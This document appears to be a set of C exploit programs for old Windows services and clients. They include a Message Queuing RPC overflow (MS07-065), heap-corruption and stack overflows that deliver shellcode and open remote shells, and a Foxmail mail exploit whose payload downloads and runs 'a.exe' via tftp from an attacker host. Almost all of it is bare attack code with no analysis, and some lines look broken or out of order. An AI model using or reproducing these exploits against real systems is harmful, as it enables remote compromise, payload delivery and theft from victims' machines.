int main(int argc, char *argv[]) { unsigned char Buff[1024]; unsigned char data; unsigned long *ps; int s, i, k; if (argc < 3) { fprintf(stderr, "Usage: %s remote_ip remote_port\n", argv[0]); return -1; } s = Make_Connection(argv[1], atoi(argv[2]), 10); if (!s) { fprintf(stderr, "[-] Connect failed. \n"); return -1; } GetShellcode(); ps = (unsigned long *)Buff; for(i=0; i<sizeof(Buff)/4; i++) { *(ps++) = 0x60000000; } i = sh_Len % 4; memcpy(&Buff[sizeof(Buff) - sh_Len], sh_Buff, sh_Len); ps = (unsigned long *)Buff; for(i=0; i<92/4; i++) { *(ps++) = RET; } Buff[sizeof(Buff)] = 0; //PrintSc(Buff, sizeof(Buff)); i = send(s, Buff, sizeof(Buff), 0); if (i <= 0) { fprintf(stderr, "[-] Send failed. \n"); return -1; } data='I'; i = send(s, &data, 1, 1); if (i <= 0) { fprintf(stderr, "[-] Send OOB data failed. \n"); return -1; } sleep (1); shell(s); }
int main() { SOCKET c,s; WSADATA WSAData; char Buff[1024]; unsigned short port; struct sockaddr_in sa; int salen = sizeof(sa); if(WSAStartup (MAKEWORD(1,1), &WSAData) != 0) { printf("[-] WSAStartup failed.\n"); WSACleanup(); exit(1); } GetShellCode(); if (!sh_Len) { printf("[-] Shellcode generate error.\n"); exit(1); } s = Make_Connection("127.0.0.1", 4444, 10); if(s<0) { printf("[-] connect error.\n"); exit(1); } // get local port getsockname(s, (struct sockaddr FAR *)&sa, &salen); Enc_key += Enc_key << 8; port = sa.sin_port^Enc_key; printf("port = %x %x\n", sa.sin_port, port); //memcpy(&sh_Buff[sh_Len], &port, 2); memcpy(&sh_Buff[sh_Len], &sa.sin_port, 2); sh_Buff[sh_Len+2] = 0; memset(Buff, 0x90, sizeof(Buff)-1); strcpy(Buff+56, JUMPESP); strcpy(Buff+60, sh_Buff); send(s,Buff,sizeof(Buff),0); Sleep(1000); shell(s); WSACleanup(); return 1; }
int main(int argc, char *argv[]) { SOCKET c,s; WSADATA WSAData; char Buff[1024]; if (argc < 3) { fprintf(stderr, "Usage: %s remote_addr remote_port", argv[0]); exit(1); } if(WSAStartup (MAKEWORD(1,1), &WSAData) != 0) { printf("[-] WSAStartup failed.\n"); WSACleanup(); exit(1); } memset(Buff, 0x90, sizeof(Buff)-1); strcpy(Buff+56, JUMPESP); strcpy(Buff+60, shellcode); s = Make_Connection(argv[1], atoi(argv[2]), 10); if(s<0) { printf("[-] connect err.\n"); exit(1); } send(s,Buff,sizeof(Buff),0); Sleep(1000); c = Make_Connection(argv[1], 4444, 10); shell(c); WSACleanup(); return 1; }
int main(int argc, char *argv[]) { unsigned char Buff[1024]; unsigned char data; unsigned long *ps; int s, i; if (argc < 3) { fprintf(stderr, "Usage: %s remote_ip remote_port\n", argv[0]); return -1; } s = Make_Connection(argv[1], atoi(argv[2]), 10); if (!s) { fprintf(stderr, "[-] Connect failed. \n"); return -1; } GetShellcode(); PrintSc(sh_Buff, sh_Len); memset(Buff, 0x90, sizeof(Buff)); strcpy(Buff + (sizeof(Buff) - sh_Len - 1), sh_Buff); ps = (unsigned long *)Buff; for(i=0; i<128/4; i++) { *(ps++) = RET; } Buff[sizeof(Buff) - 1] = 0; i = send(s, Buff, sizeof(Buff), 0); if (i <= 0) { fprintf(stderr, "[-] Send failed. \n"); return -1; } data='I'; i = send(s, &data, 1, 1); if (i <= 0) { fprintf(stderr, "[-] Send OOB data failed. \n"); return -1; } sleep (1); // get shell use same socket shell(s); }
int main (int argc, char *argv[]) { unsigned char *target = NULL; unsigned char *name = NULL; int port = 2103; int i, j, len, len2; int ret; char buffer[6000] = { 0 }; SOCKET s; WSADATA WSAData; printf("--------------------------------------------------------------------------\n"); printf("-== Windows Message Queuing Service RPC BOF Exploit (MS07-065) - MK mod ==-\n"); printf("-== code by axis@ph4nt0m ==-\n"); printf("-== Http://www.ph4nt0m.org ==-\n"); printf("-== Tested against Windows 2000 server SP4 ==-\n"); printf ("--------------------------------------------------------------------------\n\n"); if (argc < 5) usage (argv[0]); //Handle parameters for (i = 1; i < argc; i++) { if ((argv[i][0] == '-')) { switch (argv[i][1]) { case 'h': target = (unsigned char *) argv[i + 1]; break; case 'p': if (strcmp (argv[i + 1], "2103") == 0) { printf ("[+] Attacking default port 2103\n"); } else { port = atoi (argv[i + 1]); } break; case 'n': name = (unsigned char *) argv[i + 1]; break; default: printf ("[-] Invalid argument: %s\n", argv[i]); usage (argv[0]); break; } i++; } else usage (argv[0]); } request_1b = malloc (sizeof (char) * (strlen (name) * 2)); if (request_1b == NULL) { printf ("Allocation Error\n"); exit (1); } strcpy (request_1b, name); for (i = 0, j = 0; j < (strlen (name) * 2); j++) { if (!(j % 2)) { *(request_1b + j) = *(name + i); } else { *(request_1b + j) = '\x00'; i++; } } /********************** attack payload ***************************/ if (WSAStartup (MAKEWORD (1, 1), &WSAData) != 0) { fprintf (stderr, "[-] WSAStartup failed.\n"); WSACleanup (); exit (1); } Sleep (1200); s = Make_Connection ((char *) target, port, 10); if (s < 0) { fprintf (stderr, "[-] connect err.\n"); exit (1); } //Send our evil Payload printf ("[*]Sending our Payload, Good Luck! ^_^\n"); printf ("[*]Sending RPC Bind String!\n"); send (s, bind_str, sizeof (bind_str), 0); Sleep (1000); printf ("[*]Sending RPC Request Now!\n"); len = 56 + (strlen (name) * 2) + 640; request_1 = calloc (len, sizeof (char)); if (request_1 == NULL) { printf ("Allocation Error\n"); exit (1); } memcpy (request_1, request_1a, 56); memcpy (request_1 + 56, request_1b, (strlen (name) * 2)); memcpy (request_1 + 56 + (strlen (name) * 2), request_1c, 640); exit(1); memset (buffer, '\x41', sizeof (buffer)); // fil the buffer to trigger seh send (s, request_1, sizeof (request_1), 0); send (s, buffer, 5104, 0); // fil the buffer to trigger seh send (s, request_2, sizeof (request_2), 0); Sleep (100); memset (buffer, 0, sizeof (buffer)); ret = recv (s, buffer, sizeof (buffer) - 1, 0); //printf("recv: %s\n", buffer); Disconnect (s); return 0; }
int main(int argc, char *argv[]) { unsigned char Buff[0x2000]; unsigned char data; unsigned short bindport; SOCKET c,s; WSADATA WSAData; unsigned short port; struct sockaddr_in sa; int salen = sizeof(sa); int l,i,j,k; PHEAP_FREE_ENTRY pFakeEntry1; PHEAP_FREE_ENTRY pFakeEntry2; PHEAP_FREE_ENTRY pFakeEntry3; if (argc < 3) { fprintf(stderr, "Usage: %s remote_addr remote_port bind_port", argv[0]); exit(1); } if (argc > 3) { bindport = atoi(argv[3]); } else { bindport = 4444; } GetShellCode(); if (sh_Len == 0) { fprintf(stderr, "Generate shellcode failed!\n"); exit(1); } Enc_key += Enc_key << 8; bindport ^= Enc_key; memcpy(&sh_Buff[sh_Len-4], &bindport, 2); bindport ^= Enc_key; if(WSAStartup (MAKEWORD(1,1), &WSAData) != 0) { printf("[-] WSAStartup failed.\n"); WSACleanup(); exit(1); } s = Make_Connection(argv[1], atoi(argv[2]), 10); if(s<0) { printf("[-] connect err.\n"); exit(1); } // Construct Buff memset(Buff, 'A', sizeof(Buff)); memcpy(Buff, sh_Buff, sh_Len); // buf2 pFakeEntry1 = (PHEAP_FREE_ENTRY)&Buff[OFFSET]; pFakeEntry1->PreviousSize = 0x8; pFakeEntry1->Size = 0x2; pFakeEntry1->SegmentIndex = 0x31; pFakeEntry1->Flags = HEAP_ENTRY_SETTABLE_FLAG2 | HEAP_ENTRY_BUSY; pFakeEntry1->Index = 0x0; pFakeEntry1->Mask = 0x0; // fakechunk1 pFakeEntry2 = (PHEAP_FREE_ENTRY)&Buff[OFFSET-64]; pFakeEntry2->PreviousSize = 0x2; pFakeEntry2->Size = 0x2; pFakeEntry2->SegmentIndex = 0x31; pFakeEntry2->Flags = HEAP_ENTRY_SETTABLE_FLAG2; pFakeEntry2->Index = 0x1; pFakeEntry2->Mask = 0x1; pFakeEntry2->FreeList.Flink = (LIST_ENTRY*)FastPebLockRoutine; pFakeEntry2->FreeList.Blink = (LIST_ENTRY*)WriteSpace; // fakechunk2 pFakeEntry3 = (PHEAP_FREE_ENTRY)&Buff[OFFSET-32]; pFakeEntry3->PreviousSize = 0x2; pFakeEntry3->Size = 0x2; pFakeEntry3->SegmentIndex = 0x31; pFakeEntry3->Flags = HEAP_ENTRY_SETTABLE_FLAG2; pFakeEntry3->Index = 0x1; pFakeEntry3->Mask = 0x1; pFakeEntry3->FreeList.Flink = (LIST_ENTRY*)0x902BD0C2; // RETN 2BD0 pFakeEntry3->FreeList.Blink = (LIST_ENTRY*)WriteSpace; i = send(s,Buff,sizeof(Buff),0); Sleep(1000); c = Make_Connection(argv[1], bindport, 10); if(c<0) { printf("[-] connect err.\n"); exit(1); } shell(c); WSACleanup(); return 1; }
//send magic mail int SendXMail( char *mailaddr, char *tftp, char *smtpserver, char *shellcode) { SOCKET csock; int ret,i=0; char buf[510], sbuf[0x10000], tmp[500], tmp1[500]; csock = Make_Connection(smtpserver, SMTPPORT, 10); if(csock<0) { printf("connect err.\n"); exit(1); } memset(buf, 0, sizeof(buf)); ret=recv(csock, buf, 4096, 0); if(ret<=0) { printf("recv err.\n"); exit(1); } printf(buf); ret=send(csock, "HELO server\r\n",strlen("HELO server\r\n"), 0); if(ret<=0) { printf("send err.\n"); exit(1); } memset(buf, 0, sizeof(buf)); ret=recv(csock, buf, 4096, 0); if(ret<=0) { printf("recv err.\n"); exit(1); } printf(buf); ret=send(csock, "MAIL FROM: [email protected]\r\n",strlen("MAIL FROM: [email protected]\r\n"), 0); if(ret<=0) { printf("send err.\n"); exit(1); } memset(buf, 0, sizeof(buf)); ret=recv(csock, buf, 4096, 0); if(ret<=0) { printf("recv err.\n"); exit(1); } printf(buf); sprintf(tmp, "RCPT TO: %s\r\n", mailaddr); ret=send(csock, tmp,strlen(tmp), 0); if(ret<=0) { printf("send err.\n"); exit(1); } memset(buf, 0, sizeof(buf)); ret=recv(csock, buf, 4096, 0); if(ret<=0) { printf("recv err.\n"); exit(1); } printf(buf); Sleep(1000); ret=send(csock, "DATA\r\n",strlen("DATA\r\n"), 0); if(ret<=0) { printf("send err.\n"); exit(1); } memset(buf, 0, sizeof(buf)); ret=recv(csock, buf, 4096, 0); if(ret<=0) { printf("recv err.\n"); exit(1); } printf(buf); printf("send exploit mail...\n"); memset(sbuf, 0, sizeof(sbuf)); memset(buf, 0, sizeof(buf)); memset(buf, 0x41, sizeof(buf)-1); memset(tmp, 0, sizeof(tmp)); //strcpy(tmp, winexec);//WinExec() address in Foxmail.exe module(foxmail 5.0.300) strcpy(tmp, shellcode);//WinExec() address in Foxmail.exe module strcat(tmp, "cmd /c tftp -i %s get a.exe&a.exe:"); sprintf(tmp1, tmp, tftp); memcpy(buf+0x100-strlen(tmp1), tmp1, strlen(tmp1)); *(int *)(buf+0x100)=0x7ffa54cd; //ret addr jmp esp *(int *)(buf+0x104)=0x80eb80eb; //jmp back *(int *)(buf+0x108)=0x7ffdf220; //writeable addr *(int *)(buf+0x110)=0x7ffdf220; //writeable addr memcpy(buf, "girl\x0d", 5); sprintf(sbuf, (char *)packet, buf); ret=send(csock, sbuf,strlen(sbuf), 0); if(ret<=0) { printf("send err.\n"); exit(1); } memset(buf, 0, sizeof(buf)); ret=recv(csock, buf, 4096, 0); if(ret<=0) { printf("recv err.\n"); exit(1); } printf(buf); printf("exploit mail sent.\n"); closesocket(csock); return 0; }